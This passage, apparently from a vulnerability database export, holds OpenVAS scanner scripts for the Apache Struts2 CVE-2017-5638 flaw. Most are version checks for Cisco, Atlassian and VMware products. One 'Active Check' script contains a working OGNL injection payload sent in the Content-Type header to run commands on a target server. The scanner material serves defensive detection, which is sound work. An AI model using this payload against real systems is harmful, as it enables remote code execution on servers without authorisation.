Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco ISE is prone to a vulnerability in Apache Struts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-13 11:35:28 +0700 (Mon, 13 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_ise_version.nasl\");\n script_mandatory_keys(\"cisco_ise/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\naffected = make_list('1.3.0.876',\n '1.4.0.253',\n '2.0.0.306',\n '2.2.0.470',\n '2.0.1.130',\n '2.1.0.474',\n '2.2.0.471');\n\nforeach af (affected) {\n if (version == af) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:55", "description": "Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Bamboo Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106652", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106652", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_bamboo_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Bamboo Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:bamboo\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106652\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Bamboo Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_bamboo_detect.nasl\");\n script_mandatory_keys(\"AtlassianBamboo/Installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Bamboo uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Bamboo 5.1 until 5.14.4, 5.15.0 until 5.15.2.\");\n\n script_tag(name:\"solution\", value:\"Update to 5.14.5, 5.15.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/BAM-18242\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"5.1.0\", test_version2: \"5.14.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.14.5\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"5.15.0\", test_version2: \"5.15.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.15.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "description": "Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106647", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucm_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106647\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucm_version.nasl\");\n script_mandatory_keys(\"cisco/cucm/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:52", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310140229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_operations_manager_VMSA-2017-0004.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_operations_manager';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140229\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n script_name(\"VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Updates are available\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n script_tag(name:\"insight\", value:\"Multiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"affected\", value:\"vROps 6.2.1, 6.3, 6.4 and 6.5\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 10:25:48 +0200 (Fri, 31 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vrealize_operations_manager_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/operations_manager/version\", \"vmware/vrealize/operations_manager/build\");\n\n exit(0);\n\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( ! build = get_kb_item( \"vmware/vrealize/operations_manager/build\" ) ) exit( 0 );\n\nif( version =~ \"^6\\.3\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.3.0 Build 5263486';\n\nif( version =~ \"^6\\.2\\.1\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.2.1 Build 5263486';\n\nif( version =~ \"^6\\.4\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.4.0 Build 5263486';\n\nif( version =~ \"^6\\.5\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.5.0 Build 5263486';\n\n\nif( fix )\n{\n report = report_fixed_ver( installed_version:version + ' Build ' + build, fixed_version:fix );\n security_message( port:port, data:report );\n exit(0);\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-26T15:41:09", "description": "Apache Struts is prone to a remote code-execution vulnerability.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "openvas", "title": "Apache Struts Remote Code Execution Vulnerability (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-25T00:00:00", "id": "OPENVAS:1361412562310140180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140180", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts Remote Code Execution Vulnerability (Active Check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140180\");\n script_version(\"2020-06-25T07:01:49+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-25 07:01:49 +0000 (Thu, 25 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 12:19:09 +0100 (Wed, 08 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_name(\"Apache Struts Remote Code Execution Vulnerability (Active Check)\");\n\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"gb_vmware_vcenter_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow an attacker to execute arbitrary\n code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP POST request.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for\n more information.\");\n\n script_tag(name:\"summary\", value:\"Apache Struts is prone to a remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = http_get_port( default:80 );\nhost = http_host_name( dont_add_port:TRUE );\n\nurls = make_list( );\n\nforeach ext( make_list( \"action\", \"do\", \"jsp\" ) ) {\n exts = http_get_kb_file_extensions( port:port, host:host, ext:ext );\n if( exts && is_array( exts ) ) {\n urls = make_list( urls, exts );\n }\n}\n\nif( get_kb_item( \"VMware_vCenter/installed\" ) )\n urls = make_list( \"/statsreport/\", urls );\n\ncmds = exploit_commands();\n\nx = 0;\n\nvt_strings = get_vt_strings();\n\nforeach url ( urls )\n{\n bound = vt_strings[\"default_rand\"];\n\n data = '--' + bound + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"' + vt_strings[\"default\"] + '\"; filename=\"' + vt_strings[\"default\"] + '.txt\"\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n vt_strings[\"default\"] + '\\r\\n' +\n '\\r\\n' +\n '--' + bound + '--';\n\n foreach cmd ( keys( cmds ) )\n {\n c = \"{'\" + cmds[ cmd ] + \"'}\";\n\n ex = \"%{(#\" + vt_strings[\"default\"] + \"='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):\" +\n \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.\" +\n \"opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().\" +\n \"clear()).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder(\" + c + \")).\" +\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\" +\n \"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\";\n\n req = http_post_put_req( port:port, url:url, data:data, add_headers:make_array( \"Content-Type:\", ex ) );\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( egrep( pattern:cmd, string:buf ) )\n {\n report = 'It was possible to execute the command `' + cmds[ cmd ] + '` on the remote host.\\n\\nRequest:\\n\\n' + req + '\\n\\nResponse:\\n\\n' + buf;\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n if( x > 25 ) break;\n}\n\nexit( 0 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:33", "description": "Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310106646", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106646", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucmim_cisco-sa-20170310-struts2.nasl 13999 2019-03-05 13:15:01Z cfischer $\n#\n# Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106646\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 13999 $\");\n\n script_name(\"Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 14:15:01 +0100 (Tue, 05 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucmim_version.nasl\");\n script_mandatory_keys(\"cisco/cucmim/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:43:22", "description": "Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108771", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108771", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108771\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.\");\n\n script_tag(name:\"insight\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website. An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value. (Vulnerability ID: HWPSIRT-2017-03094)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2017-5638.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value.\");\n\n script_tag(name:\"affected\", value:\"AAA versions V300R003C30 V500R005C00 V500R005C10 V500R005C11 V500R005C12\n\nAnyOffice versions 2.5.0302.0201T 2.5.0501.0290\n\niManager NetEco 6000 versions V600R007C91\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170316-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:29", "description": "Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Crowd Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106653", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_crowd_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Crowd Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:crowd\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106653\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Crowd Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_crowd_detect.nasl\");\n script_mandatory_keys(\"atlassian_crowd/installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Crowd uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", 